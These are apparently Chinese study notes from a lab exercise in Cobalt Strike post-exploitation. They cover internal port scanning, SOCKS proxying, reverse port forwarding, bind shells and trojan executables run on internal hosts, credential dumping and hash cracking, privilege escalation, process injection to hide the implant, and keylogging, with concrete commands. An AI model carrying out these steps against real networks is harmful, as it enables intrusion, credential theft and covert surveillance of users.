1、端口扫描portscan
2、socket4a代理
3、内网渗透-端口转发
4、内网渗透-bind反弹shell
5、密码抓取hashdump logonpasswords
6、提权elevate
7、进程管理
8、进程注入inject
9、屏幕监控desktop
10、键盘记录keylogger
实验拓扑:
cs端已经拿到web的shell,对内网主机进行渗透
端口扫描
portscan 192.168.2.0/24 1-1000 对网段存活的主机进行存活扫描和端口扫描,可以用于内网扫描
或者图形化界面 右键-目标-端口扫描
有两种扫描方式可供选择:arp和icmp
在视图-目标中可以查看扫描到的主机
右键主机-服务即可以图形化显示扫描到的结果
socket4a代理
右键-中转(pivoting)-SOCKS Server-选择代理服务端口
此命令相当于在bacon命令行下输入 socks 端口
视图-代理信息-tunnel
将内容复制到msf中设置socket4a代理,注意127.0.0.1要更改为代理服务器的IP地址
无需再设置socket,直接对内网网段进行扫描(只能在msf中使用)
如果内网的服务器是一个网站,设置浏览器的代理即可访问内网网站
停止代理:socks stop
代理可以配合proxifier使用
添加代理服务器
检查代理服务器的连接情况
添加代理规则,默认所有连接到互联网的程序都会经过设置的代理
添加设置过滤条件过滤,只拦截nmap ,其他应用放行
其他应用放行
使用nmap扫描192.168.2.0/24(内网)开3389的存活IP
nmap -Pn -sT -p 3389 192.168.2.0/24
ps:CS可以开启代理,但是是socks4的代理,只能使用tcp协议,所以nmap使用的时候要使用-sT选择使用tcp_协议,还要使用-Pn不使用ICMP_的ping
内网渗透-端口转发
cs端已经拿到web的shell,下一步进行内网渗透,需要使用端口转发
dmz区:为了解决安装防火墙后外部网络的访问用户不能访问内部网络服务器的问题,而设立的一个非安全系统与安全系统之间的缓冲区
一台主机,既有公网ip又有内网ip,需要借助这台主机为跳板进行内网渗透
方式一
右键-中转(pivoting)-listener
或者命令行
rportfwd 4444 windows/beacon_reverse_tcp
会生成一个新的监听器用于监听web端的流量,不会生成新的代理
web端靶机开始监听4444端口
接着在cs端生成exe
注意payload一定要选择已经端口转发的payload
将生成的exe文件在内网运行
web端的4444端口和内网建立起了连接
cs端上线 上线的肉鸡ip地址后面会跟有4个点,意思是通过192.168.2.131上线的
方式二(命令行)
rportfwd 4444 172.20.10.6 5555
4444是web端监听的端口
172.20.10.6 是将流量转发到teamserver(kali)上
5555是kali端监听的端口
这条命令意思为将192.168.2.131的4444端口转发到172.20.10.6的5555端口
视图-代理信息 会生成代理,不会生成新的监视器
web端开始监听4444端口
生成一个端口为4444的监听器,注意ip地址为web端的IP
生成一个端口为5555的监听器IP地址为cs服务端(kali)IP地址
kali端开始监听5555端口
接着生成exe文件,payload一定要选择web端,因为要使用web端进行端口转发
将exe文件在内网执行
web端的4444端口和内网建立起连接
cs端
内网渗透-bind反弹shell
拿到web的shell,对内网192.168.2.129进行渗透
生成bind的监听器
然后Windows Executable(Stageless) # 生成无状态的可执行exe木马
木马生成以后,放入192.168.2.129内网机器执行
内网监听4444端口
cs端进入web端的beacon连接内网的4444端口
连接命令 :connect 192.168.2.129
成功反弹shell
断开连接命令:unlink 192.168.2.129
虽然断开了连接,内网机器仍然监听4444端口
web端的beacon可以随时连接内网机器的shell
密码抓取 需要高权限
hashdump
logonpasswords
Windows系统下的hash密码格式为:用户名称:RID:LM-HASH值:NT-HASH值
使用网站对NT-HASH值进行破解
https://objectif-securite.ch/en/ophcrack
密码抓取后在视图-凭证查看
提权elevate
elevate 插件名称 支持tab键补齐
进程管理
右键-目标-进程管理 或 ps
pid为该进程的pid
ppid为该进程的父进程的pid
配合kill杀死进程或者inject注入进程
进程注入
inject
inject pid x64|x86
或者图形化界面
右键-目标-进程管理-inject
注入完成会新生成一个会话(一定要注入到高权限的进程),将原来的木马进程杀死以便更好地隐藏
屏幕监控:desktop
键盘记录keylogger
视图-键盘记录